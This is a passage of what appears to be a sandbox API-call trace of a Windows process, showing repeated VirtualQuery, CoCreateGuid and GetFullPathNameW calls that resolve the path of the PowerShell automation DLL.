	[0411.943] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.943] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.943] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.944] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] VirtualQuery (in: lpAddress=0x20b860, lpBuffer=0x20c720, dwLength=0x30 | out: lpBuffer=0x20c720*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.945] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x2bffb56a, Data2=0x8730, Data3=0x4c61, Data4=([0]=0xa1, [1]=0xf2, [2]=0x13, [3]=0x59, [4]=0x3f, [5]=0x32, [6]=0x28, [7]=0xd9))) returned 0x0
	[0411.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.950] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.950] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.951] VirtualQuery (in: lpAddress=0x20bc30, lpBuffer=0x20caf0, dwLength=0x30 | out: lpBuffer=0x20caf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.951] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.951] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.951] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.951] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.951] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20b860, lpBuffer=0x20c720, dwLength=0x30 | out: lpBuffer=0x20c720*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.952] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.953] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.953] VirtualQuery (in: lpAddress=0x20bb90, lpBuffer=0x20ca50, dwLength=0x30 | out: lpBuffer=0x20ca50*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.953] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.953] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x604830c, Data2=0xde04, Data3=0x447f, Data4=([0]=0x8e, [1]=0xf, [2]=0xc2, [3]=0xea, [4]=0x94, [5]=0xe6, [6]=0xed, [7]=0xf2))) returned 0x0
	[0411.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
